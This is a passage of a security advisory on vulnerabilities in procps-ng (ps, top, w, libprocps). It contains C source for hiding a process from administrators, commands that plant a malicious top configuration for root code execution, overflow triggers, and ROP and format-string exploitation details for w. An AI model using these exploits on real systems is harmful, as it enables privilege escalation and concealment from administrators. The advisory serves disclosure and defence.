}\n die();\n}\nEOF\n$ gcc -Wall fuse-backed-cmdline.c -o fuse-backed-cmdline\n$ ./fuse-backed-cmdline `perl -e 'print \"A\" x 8192'`\n\nThen, if root executes ps (for example):\n\n# time ps ax\n PID TTY STAT TIME COMMAND\n...\nreal 1m0.021s\nuser 0m0.003s\nsys 0m0.017s\n\n\n========================================================================\n2. Unprivileged process hiding (CVE-2018-1121)\n========================================================================\n\nSeveral procps-ng utilities (pgrep, pidof, pkill, ps, w) read the\n/proc/PID/cmdline of every process running on the system; hence, an\nunprivileged attacker can hide a process (albeit noisily) by exploiting\na denial of service in procps-ng (for example, the FUSE-backed denial of\nservice, or one of the integer overflows in file2strvec()).\n\nAlternatively, we devised a stealthier method for hiding a process:\n\n1/ fork() our process until it occupies the last PID\n(/proc/sys/kernel/pid_max - 1) or one of the last PIDs;\n\n2/ monitor (with inotify) the /proc directory and the /proc/PID/stat\nfile of one of the very first PIDs, for IN_OPEN events (opendir() and\nopen());\n\n3/ when these events occur (when a procps-ng utility starts scanning\n/proc for /proc/PID entries), fork() our process until its PID wraps\naround and occupies one of the very first PIDs;\n\n4/ monitor (with inotify) the /proc directory for an IN_CLOSE_NOWRITE\nevent (closedir());\n\n5/ when this event occurs (when the procps-ng utility stops scanning\n/proc), go back to 1/.\n\nThis simple method works, because the kernel's proc_pid_readdir()\nfunction returns the /proc/PID entries in ascending numerical order.\nMoreover, this race condition can be made deterministic by using a\nFUSE-backed /proc/PID/cmdline as a synchronization tool.\n\n$ cat > unprivileged-process-hiding.c << \"EOF\"\n#include <errno.h>\n#include <limits.h>\n#include <signal.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/inotify.h>\n#include <sys/stat.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n#include <unistd.h>\n\n#define die() do { \\\n fprintf(stderr, \"died in %s: %u\\n\", __func__, __LINE__); \\\n exit(EXIT_FAILURE); \\\n} while (0)\n\nint\nmain(void)\n{\n for (; {\n char lost[64];\n {\n const pid_t hi = getpid();\n pid_t lo = fork();\n if (lo <= -1) die();\n if (!lo) { /* child */\n lo = getpid();\n if (lo < hi) exit(EXIT_SUCCESS); /* parent continues */\n for (; {\n if (kill(hi, 0) != -1) continue;\n if (errno != ESRCH) die();\n break;\n }\n continue;\n }\n /* parent */\n if (lo > hi) exit(EXIT_FAILURE); /* child continues */\n int status = 0;\n if (waitpid(lo, &status, 0) != lo) die();\n if (!WIFEXITED(status)) die();\n if (WEXITSTATUS(status) != EXIT_SUCCESS) die();\n\n printf(\"%d -> %d -> \", hi, lo);\n for (; {\n struct stat st;\n if (--lo <= 0) die();\n snprintf(lost, sizeof(lost), \"/proc/%d/stat\", lo);\n if (stat(lost, &st) == 0) break;\n }\n printf(\"%d\\n\", lo);\n }\n\n const int pofd = inotify_init();\n if (pofd <= -1) die();\n if (inotify_add_watch(pofd, \"/proc\", IN_OPEN) <= -1) die();\n\n const int lofd = inotify_init();\n if (lofd <= -1) die();\n if (inotify_add_watch(lofd, lost, IN_OPEN) <= -1) die();\n\n const int pcfd = inotify_init();\n if (pcfd <= -1) die();\n if (inotify_add_watch(pcfd, \"/proc\", IN_CLOSE_NOWRITE) <= -1) die();\n\n char buf[sizeof(struct inotify_event) + NAME_MAX + 1];\n const struct inotify_event * const evp = (void *)buf;\n\n for (; {\n if (read(pofd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();\n if (evp->mask & IN_ISDIR) break;\n }\n\n if (read(lofd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();\n for (; {\n const pid_t hi = getpid();\n pid_t lo = fork();\n if (lo <= -1) die();\n if (lo) exit(EXIT_SUCCESS); /* parent */\n /* child */\n lo = getpid();\n if (lo < hi) {\n printf(\"%d -> %d\\n\", hi, lo);\n break;\n }\n }\n\n for (; {\n if (read(pcfd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();\n if (evp->mask & IN_ISDIR) break;\n }\n\n if (close(pofd)) die();\n if (close(lofd)) die();\n if (close(pcfd)) die();\n }\n die();\n}\nEOF\n$ gcc -Wall unprivileged-process-hiding.c -o unprivileged-process-hiding\n$ ./unprivileged-process-hiding\n\nThen, if root executes ps (for example):\n\n# ps ax | grep '[u]nprivileged-process-hiding' | wc\n 0 0 0\n\n\n========================================================================\n3. Local Privilege Escalation in top (CVE-2018-1122)\n========================================================================\n\nIf a/ an administrator executes top in a directory writable by an\nattacker and b/ the HOME environment variable is unset or empty, then\ntop reads its configuration file from the current working directory,\nwithout any security check:\n\n3829 static void configs_read (void) {\n....\n3847 p_home = getenv(\"HOME\");\n3848 if (!p_home || p_home[0] == '\\0')\n3849 p_home = \".\";\n3850 snprintf(Rc_name, sizeof(Rc_name), \"%s/.%src\", p_home, Myname);\n3851 \n3852 if (!(fp = fopen(Rc_name, \"r\"))) {\n....\n3865 if (fp) {\n3866 p = config_file(fp, Rc_name, &tmp_delay);\n\nAlthough b/ is very unlikely, we developed a simple command-line method\nfor exploiting one of the vulnerabilities in config_file(), when top is\nnot a PIE (Position-Independent Executable). For example, on Ubuntu\n16.04.4:\n\n$ file /usr/bin/top\n/usr/bin/top: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e64fe2c89ff07ca4ce5d169078586d2854628a29, stripped\n\nFirst, we dump a clean configuration file to /tmp/.toprc, by running top\nand pressing the 'W' key:\n\n$ cd /tmp\n$ env -u HOME top\nW\nq\n\nSecond, we add an arbitrary \"inspect\" command to this configuration file\n(inspect commands are normally executed when the user presses the 'Y'\nkey):\n\n$ echo -e 'pipe\\tname\\tid>>/tmp/top.%d.%lx' >> .toprc\n\nTo execute our inspect command without user interaction, we will emulate\nthe 'Y' key by jumping directly into inspection_utility(), at 0x40a989\n(the fflush(stdout) is INSP_BUSY's last instruction):\n\n3442 static void inspection_utility (int pid) {\n....\n3496 case kbd_ENTER:\n3497 INSP_BUSY;\n3498 Insp_sel = &Inspect.tab[sel];\n3499 Inspect.tab[sel].func(Inspect.tab[sel].fmts, pid);\n\n 40a97d: 48 8b 3d 1c f8 20 00 mov 0x20f81c(%rip),%rdi # 61a1a0 <stdout>\n 40a984: e8 67 7f ff ff callq 4028f0 <fflush@plt>\n 40a989: 48 63 05 2c f9 20 00 movslq 0x20f92c(%rip),%rax # 61a2bc\n 40a990: 8b 74 24 74 mov 0x74(%rsp),%esi\n 40a994: 48 c1 e0 06 shl $0x6,%rax\n 40a998: 48 03 05 61 11 23 00 add 0x231161(%rip),%rax # 63bb00\n 40a99f: 48 89 05 12 11 23 00 mov %rax,0x231112(%rip) # 63bab8\n 40a9a6: 48 8b 78 18 mov 0x18(%rax),%rdi\n 40a9aa: ff 10 callq *(%rax)\n 40a9ac: 5b pop %rbx\n\nTo jump directly into inspection_utility(), we will take control of\ntop's execution flow, by exploiting a vulnerability in config_file().\n\"sortindx\" is read from the configuration file without any sanity check,\nand is later used by window_show() to access a struct FLD_t which\ncontains a function pointer \"sort\":\n\n5876 static int window_show (WIN_t *q, int wmax) {\n....\n5894 qsort(q->ppt, Frame_maxtask, sizeof(proc_t*), Fieldstab[q->rc.sortindx].sort);\n\n 40de01: ba 08 00 00 00 mov $0x8,%edx\n 40de06: 48 c1 e0 05 shl $0x5,%rax\n 40de0a: 48 8b 88 30 99 61 00 mov 0x619930(%rax),%rcx\n 40de11: e8 7a 47 ff ff callq 402590 <qsort@plt>\n\nTo take control of this function pointer, we will write 0x40a989's LSW\n(Least Significant Word, 32 bits) into \"graph_mems\" and 0x40a989's MSW\n(Most Significant Word, 32 bits) into \"summclr\", which are read from the\nconfiguration file and written to 0x63ed30 (and 0x63ed34), a memory\nlocation accessible by 0x619930+(sortindx<<0x5):\n\n3676 static const char *config_file (FILE *fp, const char *name, float *delay) {\n....\n3710 if (3 > fscanf(fp, \"\\twinflags=%d, sortindx=%d, maxtasks=%d, graph_cpus=%d, graph_mems=%d\\n\"\n3711 , &w->rc.winflags, &w->rc.sortindx, &w->rc.maxtasks, &w->rc.graph_cpus, &w->rc.graph_mems))\n3712 return p;\n3713 if (4 != fscanf(fp, \"\\tsummclr=%d, msgsclr=%d, headclr=%d, taskclr=%d\\n\"\n3714 , &w->rc.summclr, &w->rc.msgsclr\n3715 , &w->rc.headclr, &w->rc.taskclr))\n3716 return p;\n\n 406f90: 4d 8d b5 30 ed 63 00 lea 0x63ed30(%r13),%r14\n .......\n 406fa9: 41 56 push %r14\n .......\n 406fb3: e8 d8 b7 ff ff callq 402790 <fscanf@plt>\n .......\n 406fca: 49 8d 95 34 ed 63 00 lea 0x63ed34(%r13),%rdx\n .......\n 406fe5: e8 a6 b7 ff ff callq 402790 <fscanf@plt>\n\nNext, we modify the configuration file's \"graph_mems\", \"summclr\", and\n\"sortindx\" accordingly:\n\n$ sed -i s/'graph_mems=[0-9]*'/graph_mems=$((0x40a989))/ .toprc\n\n$ sed -i s/'summclr=[0-9]*'/summclr=0/ .toprc\n\n$ sed -i s/'sortindx=[0-9]*'/sortindx=$(((0x63ed30-0x619930)>>0x5))/ .toprc\n\nLast, we turn off the View_MEMORY bit in the configuration file's\n\"winflags\", to prevent summary_show() from crashing because of our\nout-of-bounds \"graph_mems\":\n\n314 #define View_MEMORY 0x001000 // 'm' - display memory summary\n\n5418 static void summary_show (void) {\n....\n5499 if (isROOM(View_MEMORY, 2)) {\n....\n5540 if (w->rc.graph_mems) {\n....\n5559 ix = w->rc.graph_mems - 1;\n....\n5572 snprintf(util, sizeof(util), gtab[ix].swap, (int)((pct_swap * Graph_adj) + .5), gtab[ix].type);\n\n$ winflags=`grep -m 1 winflags= .toprc | sed s/'.*winflags=\\([0-9]*\\).*'/'\\1'/`\n$ sed -i s/'winflags=[0-9]*'/winflags=$((winflags&~0x001000))/ .toprc\n\nThen, if an administrator executes top in /tmp, without a HOME\nenvironment variable (or with an empty HOME environment variable):\n\n# cat /tmp/top.*\ncat: '/tmp/top.*': No such file or directory\n\n# cd /tmp\n# env -u HOME top\n...\n signal 11 (SEGV) was caught by top, please\n see http://www.debian.org/Bugs/Reporting\nSegmentation fault (core dumped)\n\n# cat /tmp/top.*\nuid=0(root) gid=0(root) groups=0(root)\n\n\n========================================================================\n4. Denial of Service in ps (CVE-2018-1123)\n========================================================================\n\nps's functions pr_args(), pr_comm(), and pr_fname() are vulnerable to an\nmmap-based buffer overflow of outbuf (ps's output buffer):\n\n 401 static int pr_args(char *restrict const outbuf, const proc_t *restrict const pp){\n 402 char *endp = outbuf;\n 403 int rightward = max_rightward;\n 404 int fh = forest_helper(outbuf);\n 405 \n 406 endp += fh;\n 407 rightward -= fh;\n 408 \n 409 if(pp->cmdline && !bsd_c_option)\n 410 endp += escaped_copy(endp, *pp->cmdline, OUTBUF_SIZE, &rightward);\n 411 else\n 412 endp += escape_command(endp, pp, OUTBUF_SIZE, &rightward, ESC_DEFUNCT);\n 413 \n 414 if(bsd_e_option && rightward>1) {\n 415 if(pp->environ && *pp->environ) {\n 416 *endp++ = ' ';\n 417 rightward--;\n 418 endp += escape_strlist(endp, pp->environ, OUTBUF_SIZE, &rightward);\n 419 }\n 420 }\n 421 return max_rightward-rightward;\n 422 }\n\nThe number of bytes written to endp by the escape*() functions is added\nto endp (a pointer into outbuf), but never subtracted from OUTBUF_SIZE.\nNormally \"rightward\" prevents this buffer overflow, because the maximum\nnumber of \"cells\" written to outbuf is OUTBUF_SIZE, and is equal to the\nnumber of \"bytes\" written to outbuf; but not in escape_str_utf8():\n\n 36 static int escape_str_utf8(char *restrict dst, const char *restrict src, int bufsize, int *maxcells){\n ..\n 50 if (!(len = mbrtowc (&wc, src, MB_CUR_MAX, &s)))\n ..\n 78 int wlen = wcwidth(wc);\n ..\n100 memcpy(dst, src, len);\n101 my_cells += wlen;\n102 dst += len;\n103 my_bytes += len;\n104 src += len;\n\nFor example, in the \"en_US.UTF-8\" locale, the multibyte sequence\n\"\\xf4\\x81\\x8e\\xb6\" consumes 4 bytes, but only 1 cell, and an easy\ntrigger for one of the outbuf overflows is:\n\n$ (A=`python -c 'print \"\\xf4\\x81\\x8e\\xb6\" * 32767'` exec -a `python -c 'print \"A\" * 65535'` sleep 60) &\n[1] 2670\n\n# env LANG=en_US.UTF-8 ps awwe\n PID TTY STAT TIME COMMAND\n...\nSignal 11 (SEGV) caught by ps (procps-ng version 3.3.10).\n 2670 pts/0 S 0:00ps:display.c:66: please report this bug\nSegmentation fault\n\nThis buffer overflow is a denial of service only (not an LPE), because\nps mmap()s outbuf and mprotect()s its last page with PROT_NONE (an\neffective guard page):\n\n2147 void init_output(void){\n....\n2164 outbuf = mmap(\n2165 0,\n2166 page_size * (outbuf_pages+1), // 1 more, for guard page at high addresses\n2167 PROT_READ | PROT_WRITE,\n2168 MAP_PRIVATE | MAP_ANONYMOUS,\n2169 -1,\n2170 0\n2171 );\n....\n2174 mprotect(outbuf + page_size*outbuf_pages, page_size, PROT_NONE); // guard page\n\n\n========================================================================\n5. Local Privilege Escalation in libprocps (CVE-2018-1124)\n========================================================================\n\n========================================================================\n5.1. Vulnerability\n========================================================================\n\nlibprocps's file2strvec() function parses a process's /proc/PID/cmdline\n(or /proc/PID/environ), and creates an in-memory copy of this process's\nargv[] (command-line argument strings, and pointers to these strings).\nfile2strvec() is called when either PROC_FILLCOM or PROC_FILLARG, but\nnot PROC_EDITCMDLCVT, is passed to openproc() or readproctab() (or\nPROC_FILLENV but not PROC_EDITENVRCVT).\n\nfile2strvec() is vulnerable to three integer overflows (of \"tot\", \"c\",\nand \"tot + c + align\"):\n\n 660 static char** file2strvec(const char* directory, const char* what) {\n 661 char buf[2048]; /* read buf bytes at a time */\n 662 char *p, *rbuf = 0, *endbuf, **q, **ret;\n 663 int fd, tot = 0, n, c, end_of_file = 0;\n 664 int align;\n ...\n 670 /* read whole file into a memory buffer, allocating as we go */\n 671 while ((n = read(fd, buf, sizeof buf - 1)) >= 0) {\n ...\n 686 rbuf = xrealloc(rbuf, tot + n); /* allocate more memory */\n 687 memcpy(rbuf + tot, buf, n); /* copy buffer into it */\n 688 tot += n; /* increment total byte ctr */\n ...\n 697 endbuf = rbuf + tot; /* count space for pointers */\n 698 align = (sizeof(char*)-1) - ((tot + sizeof(char*)-1) & (sizeof(char*)-1));\n 699 for (c = 0, p = rbuf; p < endbuf; p++) {\n 700 if (!*p || *p == '\\n')\n 701 c += sizeof(char*);\n ...\n 705 c += sizeof(char*); /* one extra for NULL term */\n 706 \n 707 rbuf = xrealloc(rbuf, tot + c + align); /* make room for ptrs AT END */\n\nTo the best of our knowledge, the integer overflows of \"c\" and \"tot + c\n+ align\" are not exploitable beyond a denial of service: they result in\nan mmap-based buffer overflow of rbuf, but with pointers only (pointers\nto our command-line argument strings, and a NULL terminator). Similarly,\nwe were unable to exploit the integer overflow of \"tot\" on 32-bit.\n\nOn 64-bit, however, the integer overflow of \"tot\" results in a memcpy()\nof arbitrary bytes (our command-line arguments) to an offset of roughly\n-2GB below rbuf. Surprisingly, the \"xrealloc(rbuf, tot + n)\" before the\nmemcpy() does not exit() when \"tot\" becomes negative, because xrealloc()\nincorrectly uses an \"unsigned int size\" argument instead of a size_t\n(CVE-2018-1126):\n\n 66 void *xrealloc(void *oldp, unsigned int size) {\n\n========================================================================\n5.2. Exploitation\n========================================================================\n\nTo exploit the integer overflow of \"tot\" on 64-bit, we are faced with\nseveral difficulties:\n\n- We must defeat NX, ASLR, PIE, full RELRO, SSP (Stack-Smashing\n Protector), and FORTIFY.\n\n- Our exploit must be one-shot, or as close to one-shot as possible: we\n may use brute-force if the target procps-ng utility is executed by a\n script, but we have only one chance to exploit this vulnerability if\n the target utility is executed manually by an administrator.\n\n- We have no control over the target utility's command-line arguments,\n environment variables, or resource limits (it is executed by another\n user, administrator, or script), and we have no direct channel for an\n information leak (we have no access to the target utility's output,\n for example).\n\n- We were unable to exploit the integer overflow of \"tot\" when rbuf is\n mmap()ed (but we were also unable to prove that it is unexploitable);\n when the integer \"tot\" overflows, rbuf is an mmap()ed chunk (its size\n is roughly 2GB), and because Linux's mmap() is a top-down allocator,\n we believe that:\n\n . rbuf must be allocated in a hole of the mmap-space (to survive the\n memcpy() at a negative offset below rbuf);\n\n . it is impossible to make such a large hole (in procps-ng, calls to\n the malloc functions are extremely rare).\n\nDespite these difficulties, we developed proof-of-concept exploits\nagainst the procps-ng utility \"w\" on Ubuntu 16.04 (a one-shot exploit\nagainst a partial RELRO, non-PIE w), Debian 9 and Fedora 27 (a nearly\none-shot exploit against a full RELRO, PIE w): if we first force \"w\" to\nmalloc()ate n_mmaps_max = 64K mmap()ed chunks (whose size is larger than\nmmap_threshold = 128KB), then malloc() will not call mmap() anymore, but\nwill call brk() instead, even for chunks larger than mmap_threshold. The\n2GB rbuf (after the integer overflow of tot) will therefore be allocated\non the heap by brk(), and because brk() is a bottom-up allocator, we can\neasily arrange for the memcpy() at rbuf - 2GB to overwrite the beginning\nof the heap:\n\n- if w is not a PIE, we overwrite libprocps's internal PROCTAB structure\n and its function pointers;\n\n- if w is a PIE, we overwrite the glibc's internal *gettext() structures\n and transform this memory corruption into a format-string exploit.\n\nTo force 64K allocations of 128KB (8GB) in w, we need 64K distinct PIDs\n(each /proc/PID/cmdline allocates 128KB in file2strvec()): consequently,\n/proc/sys/kernel/pid_max must be greater than 64K (it is 32K by default,\neven on 64-bit). This is not an unusual setting: large servers (database\nservers, container and storage platforms) commonly increase the value of\npid_max (up to 4M on 64-bit). Besides pid_max, other settings may limit\nour ability to spawn 64K processes: /proc/sys/kernel/threads-max,\nRLIMIT_NPROC, and systemd-logind's UserTasksMax. Unlike pid_max,\nhowever, these limits are not insuperable obstacles:\n\n- they may be naturally greater than 64K, depending on the total number\n of RAM pages (for /proc/sys/kernel/threads-max and RLIMIT_NPROC) or\n the value of pid_max (for UserTasksMax);\n\n- they may not apply to the attacker's user account (for example,\n systemd-logind may not at all manage this specific user account);\n\n- in any case, we do not need to spawn 64K concurrent processes: if we\n use /proc/PID/cmdline as a FUSE-backed synchronization tool, we need\n only a few concurrent processes.\n\n========================================================================\n5.3. Exploitation details\n========================================================================\n\nOur proof-of-concept exploit spawns five different types of processes\n(\"main\", \"mmap\", \"dist\", \"wrap\", and \"srpt\"):\n\n- a long-lived \"main\" process, which spawns and coordinates the other\n processes;\n\n- 64K long-lived \"mmap\" processes, which guarantee that the ~2GB rbufs\n of our \"dist\" and \"wrap\" processes are allocated by brk() in the heap\n of our future \"w\" target; the \"mmap\" processes occupy the lowest PIDs\n available, to avoid interference from other processes with the heap\n layout of w;\n\n- a long-lived \"dist\" (\"distance\") process, whose /proc/PID/cmdline is\n carefully constructed to cover the exact distance between our target\n structure (at the beginning of w's heap) and the rbuf of our \"wrap\"\n process (at the end of w's heap);\n\n- a long-lived \"wrap\" (\"integer wrap\") process, which overflows the\n integer \"tot\" and overwrites our target structure at the beginning of\n w's heap (with the memcpy() at rbuf - 2GB);\n\n- short-lived \"srpt\" (\"simulate readproctab\") processes, which measure\n the exact distance between our target structure (at the beginning of\n w's heap) and the rbuf of our \"wrap\" process (at the end of w's heap);\n because this distance depends on an accurate list of processes running\n on the system, our exploit regularly spawns \"srpt\" processes until the\n distance stabilizes (it is particularly unstable after a reboot).\n\nWe use a few noteworthy tricks in this exploit:\n\n- we do not fork() but clone() the \"mmap\" processes (we use the flags\n CLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SYSVSEM | CLONE_SIGHAND, but\n not CLONE_THREAD, because each process must have its own /proc/PID\n entry): this is much faster, and significantly reduces the memory\n consumption of our exploit (the target \"w\" process itself already\n consumes over 12GB = 64K*128KB + 2GB + 2GB -- the rbufs for the\n \"mmap\", \"dist\", and \"wrap\" processes);\n\n- we analyze the ~2GB command-line argument strings of our \"dist\" and\n \"wrap\" processes, to detect repeated patterns and replace them with\n our equivalent file-backed mmap()s (this further reduces the memory\n consumption of the exploit); moreover, we replace the argv[] pointers\n of these processes with PROT_NONE mmap()s (hundreds of megabytes that\n are never accessed);\n\n- we initially simulated readproctab() with our own exploit code, but\n eventually switched to a small LD_PRELOAD library that instruments the\n real \"w\" utility and provides more accurate measurements.\n\nThere is much room for improvement in this proof-of-concept exploit: for\nexample, it depends on the exact distance between our target structure\n(at the beginning of w's heap) and the rbuf of our \"wrap\" process (at\nthe end of w's heap), but this distance is hard to measure inside a\ncontainer, because processes running outside the container are not\nvisible inside the container (brute-force may be a solution if the\ntarget utility is executed by a script, but not if it is executed\nmanually by an administrator; better solutions may exist).\n\n========================================================================\n5.4. Non-PIE exploitation\n========================================================================\n\nIn this section, we describe our simplest proof-of-concept exploit,\nagainst the non-PIE \"w\" on Ubuntu 16.04: we overflow the integer \"tot\"\nin file2strvec(), we overwrite the PROCTAB structure and its function\npointers, and we jump into the executable segment of w. However, w is\nvery small and contains no useful gadgets, syscall instructions, or\nlibrary calls. Instead, we use a technique pioneered by Nergal in\nhttp://phrack.org/issues/58/4.html (\"5 - The dynamic linker's\ndl-resolve() function\"):\n\nWe jump to the very beginning of w's PLT (Procedure Linkage Table),\nwhich calls _dl_runtime_resolve() and _dl_fixup() with a \"reloc_arg\"\nthat we control (it is read from the stack) and that indexes our own\nfake Elf64_Rela structure (in w's heap), which in turn indexes a fake\nElf64_Sym structure, which in turn indexes a string that we control and\nthat allows us to call any library function, by name (even if it does\nnot appear in w's PLT). The obvious choice here is the \"system\"\nfunction:\n\n- the RDI register (the first argument of the function pointer that we\n overwrote, and hence the command argument of system()) points to the\n PROCTAB structure, whose contents we control;\n\n- we do not need to worry about the privilege dropping of /bin/sh,\n because w is not a set-user-ID executable.\n\nFinally, we must solve two practical problems to use this dynamic-linker\ntechnique against w:\n\n- our fake ELF structures are located in the heap, but indexed from the\n executable, and a random gap separates the heap from the executable:\n we therefore allocate four large areas in the heap (large enough to\n defeat the randomization of the heap), one for each of our fake\n structures (Elf64_Rela, Elf64_Sym, \"system\", and ndx for symbol\n versioning);\n\n- malloc guarantees a 16-byte alignment, but Elf64_Rela and Elf64_Sym\n are 24-byte structures: luckily, the last 8 bytes of these structures\n are unused, and we therefore truncate our fake structures to 16 bytes.\n\nFor example, on Ubuntu 16.04.4, we overwrite the PROCTAB structure with\nthe following ROP chain:\n\n procfs taskdir tdu df finder reader tfinder\n|--------|--------|----+---|--------|--------|--------|------|--------|--------|\n| id>>/tmp/w.$$ |000|0x4020bb|0x4029db|0x401100| .... |relocarg|0x402a50|\n|--------|--------|----+---|--------|--------|--------|------|--------|--------|\n 0xffb8 bytes\n\n- the first gadget that we execute, 0x4020bb, pivots the stack pointer\n to RDI (which points to the very beginning of the PROCTAB structure):\n \"push rdi; ...; pop rsp; pop r13; pop r14; pop r15; pop rbp; ret;\"\n\n- the second gadget that we execute, 0x4029db, increases the stack\n pointer by 0xffb8 bytes (it would otherwise crash into the beginning\n of the heap, because the stack grows down): \"ret 0xffb8;\"\n\n- the third gadget that we execute, 0x401100, calls\n _dl_runtime_resolve() and _dl_fixup() with our own \"relocarg\" (this\n effectively calls system() with the command located at RDI,\n \"id>>/tmp/w.$$\"):\n\n 401100: ff 35 02 2f 20 00 pushq 0x202f02(%rip)\n 401106: ff 25 04 2f 20 00 jmpq *0x202f04(%rip)\n\n- the fourth gadget that we execute, 0x402a50, makes a clean exit:\n\n 402a50: bf 01 00 00 00 mov $0x1,%edi\n 402a55: e8 36 e7 ff ff callq 401190 <_exit@plt>\n\n$ ./w-exploit-Non-PIE\npositive_tot 2147482113\ndistance_tot 2147482112\ndistance 12024752\n...\ndistance 12024752\noff 279917264\nver_beg 2e26ce0 ver_end 5426ce0\nrel_beg 15f19fb0 rel_end 18519fb0\nstr_beg 2900d280 str_end 2b60d280\nsym_beg 3c100570 sym_end 3e700570\nreloc_arg 16957128\nnentries 5\nPOSITIVE_TOT 2147482113\nDISTANCE_TO_PT 1\nnegwrite_off 2147485183\nnentries 1\nready\n\nThen, if an administrator executes w:\n\n# cat /tmp/w.*\ncat: '/tmp/w.*': No such file or directory\n\n# w\n\n# cat /tmp/w.*\nuid=0(root) gid=0(root) groups=0(root)\n\n========================================================================\n5.5. PIE exploitation\n========================================================================\n\nIn this section, we describe our proof-of-concept exploit against the\nPIE \"w\" on Debian 9 and Fedora 27. The first technique that we tried, a\npartial overwrite of a function pointer in the PROCTAB structure, does\nnot work:\n\n- we are limited to a 2-byte overwrite, or else we lose the \"one-shot\"\n quality of our exploit (we must brute-force the random bits that we\n overwrite);\n\n- the original function pointer refers to a piece of code in libprocps\n that offers a very limited choice of gadgets;\n\n- file2strvec() ends our command-line argument strings (which overwrite\n the function pointer) with a null byte, and further reduces the number\n of available gadgets.\n\nOur second, working technique is derived from halfdog's fascinating\nhttps://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ and\ntransforms libprocps's integer overflow and memory corruption into a\nformat-string exploit:\n\n- we overwrite the dirname pointer to \"/usr/share/locale\" (a member of\n the struct binding malloc()ated at the very beginning of w's heap by\n bindtextdomain()) with a pointer to \"/tmp\" -- we do not need to worry\n about ASLR, because we arrange for file2strvec() to overwrite dirname\n with a pointer to our command-line argument strings; alternatively, we\n could overwrite the \"procps-ng\" string (malloc()ated at the beginning\n of w's heap by textdomain()), but this would also overwrite the chunk\n header of the struct PROCTAB, and would cause a crash in closeproc();\n\n- we thereby control the translation strings returned by the *gettext()\n functions and the _() macro (the overwritten dirname pointer is used\n to construct the names of the translation files \".mo\") and therefore\n control two format-strings in w's main():\n\n591 printf(_(\"%-*s TTY \"), userlen, _(\"USER\"));\n...\n595 printf(_(\" LOGIN@ IDLE JCPU PCPU WHAT\\n\"));\n\n- we exploit the first format-string to create a pointer to a saved RIP\n on the stack, and we write this pointer to the stack itself;\n\n- we use this pointer, and the second format-string, to overwrite the\n saved RIP with the address of a useful libc gadget (we return into\n popen() on Debian 9, and wordexp() on Fedora 27).\n\nHowever, unlike halfdog, we cannot defeat ASLR by simply dumping the\ncontents of the stack with a format-string, because we have not access\nto the output of \"w\" (it is executed by another user, administrator, or\nscript). Instead, we implement Chris Evans's \"read-add-write\" primitive\nhttps://scarybeastsecurity.blogspot.com/2016/11/0day-exploit-advancing-exploitation.html\n(\"Trick #6: co-opting an addition primitive\") with format-strings only.\n\nWith the first format-string:\n\n- we \"read\" the LSW (Least Significant Word, 32 bits) of a stack pointer\n that is located on the stack itself and hence accessible through the\n format-string arguments -- for example, the argv pointer;\n\n- we \"add\" a distribution-specific constant to this LSW, to make it\n point to a saved RIP on the stack -- for example, the saved RIP pushed\n onto the stack by the call to printf_positional() in vfprintf();\n\n- we \"write\" this modified LSW to the LSW of another stack pointer that\n is also located on the stack itself and hence accessible through the\n format-string arguments -- for example, the argv[0] pointer.\n\nWith the second format-string:\n\n- we \"read\" the LSW of a libc pointer that is located on the stack and\n hence accessible through the format-string arguments -- for example,\n the pointer to __libc_start_main();\n\n- we \"add\" a distribution-specific constant to this LSW, to make it\n point to a useful libc gadget -- for example, popen() or wordexp();\n\n- we \"write\" this modified LSW to the LSW of a saved RIP on the stack:\n we use the pointer (to the saved RIP) created on the stack by the\n first format-string.\n\nTo implement the \"read-add-write\" primitive:\n\n- we \"read\" the LSW of a pointer (we load it into vfprintf's internal\n character counter) through a variable-width specifier such as \"%*R$x\",\n where R is the position (among the format-string arguments on the\n stack) of the to-be-read pointer;\n\n- we \"add\" a constant A to this LSW through a constant-width specifier\n such as \"%Ax\";\n\n- we \"write\" this modified LSW to the LSW of another pointer through a\n specifier such as \"%W$n\", where W is the position (among the format-\n string arguments on the stack) of a pointer to the to-be-overwritten\n pointer (for example, in our first format-string we overwrite the LSW\n of the argv[0] pointer through the argv pointer, and in our second\n format-string we overwrite the LSW of a saved RIP through the\n overwritten argv[0] pointer); in summary:\n\n . if we want to \"add\" a constant to the LSW that we \"read\", we use a\n simple format-string such as \"%*R$x%Ax%W$n\", where A is equal to the\n constant that we want to add;\n\n . if we want to \"subtract\" a constant from the LSW that we \"read\", we\n use a format-string such as \"%*R$x%W$n%Ax%W$hn\", where A is equal to\n 65536 minus the constant that we want to subtract (the smaller the\n constant, the higher the probability of success).\n\nThis generic technique defeats NX, ASLR, PIE, SSP, and FORTIFY, but it\nsuffers from three major drawbacks:\n\n- it requires two different format-strings, because it must reset\n vfprintf's internal character counter between the two \"read-add-write\"\n primitives;\n\n- its probability of success is 1/4 (not a one-shot, but not a\n brute-force either), because the probability of success of each\n \"read-add-write\" primitive is 1/2 (the randomized LSW that is \"read\"\n as an \"int width\" must be positive), and the stack is randomized\n independently of the libc;\n\n- it outputs 2*1GB on average (2*2GB at most): this may be acceptable if\n the target utility is executed by a script or daemon, but not if it is\n executed manually by an administrator (terminal escape sequences may\n be used to overcome this drawback, but we did not explore this\n possibility yet).\n\nIt is also possible to implement distribution-specific variants of this\ngeneric technique: for example, we developed a Debian-specific version\nof our \"w\" exploit that requires only one format-string, has an 11/12\nprobability of success (nearly one-shot), and outputs only a few\nkilobytes. This is left as an exercise for the interested reader.\n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe thank Craig Small and the members of linux-distros@openwall 